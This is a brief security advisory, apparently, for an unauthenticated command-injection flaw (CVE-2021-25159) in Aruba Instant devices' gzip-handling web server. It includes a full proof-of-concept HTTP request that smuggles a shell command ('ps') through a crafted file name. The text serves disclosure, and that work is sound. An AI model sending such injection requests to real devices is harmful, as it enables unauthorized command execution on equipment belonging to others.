An unauthenticated attacker can execute arbitrary commands on Aruba Instant devices, to be able to exploit this vulnerability the attacker has to put a file with a command in the file name in the HTTP directory.
All the files in the webserver directory are compressed with gzip compression. If a client requests a file without accepting gzip then the webserver will do the uncompression for him and execute gunzip.
The filename parameter is unsanitized and can be used to execute arbitrary commands. An attacker can create a file with CVE-2021-25159 and execute commands.
GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';%20ps%20#aaaaaaaaaaaaaaaaaaa HTTP/1.1 Host: IP:4343 Connection: close Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Language: en-US,en;q=0.9